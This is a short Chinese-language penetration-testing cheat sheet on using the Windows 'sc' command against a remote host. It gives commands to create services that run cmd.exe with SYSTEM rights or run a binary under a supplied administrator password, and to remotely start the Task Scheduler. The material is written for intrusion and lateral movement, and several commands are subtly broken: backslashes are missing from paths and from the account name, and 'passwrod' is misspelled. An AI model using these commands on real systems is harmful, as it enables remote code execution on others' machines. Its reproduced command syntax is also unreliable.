sc 在滲透中常用的功能有三個,遠程執行東西,遠程開啟/關閉服務,查服務的信息,如服務的exe路徑。
1.1 執行命令(系統權限):
//其他執行命令方法參考:http://bra.adminsec.com/security/787.html
sc 10.1.1.1 create winnt binpath= c:cmd.exe
sc 10.1.1.1 start winnt
sc 10.1.1.1 delete winnt
1.2 執行命令(指定用戶權限)
sc 10.1.1.1 create adminsec binpath = "c:pass.exe" obj= "adminsecadministrator" passwrod= adminsec
sc ip start testsrvname
2、 遠程開啟/關閉服務,如啟動計劃任務。感覺at執行東西比sc兼容更好。
sc.exe 10.1.1.1 config schedule start= auto //注意=後面有個空格,有時候不anto開啟不成功。
sc.exe 10.1.1.1 start "schedule"
關閉某個服務:
sc getkeyname "Task Scheduler" //獲取服務名
sc stop "Schedule"
其他技巧,如需要獲取某個服務的執行文件路徑。
sc qc schedule
PS: sc要注意的是服務名和顯示名,這2個是不同的概念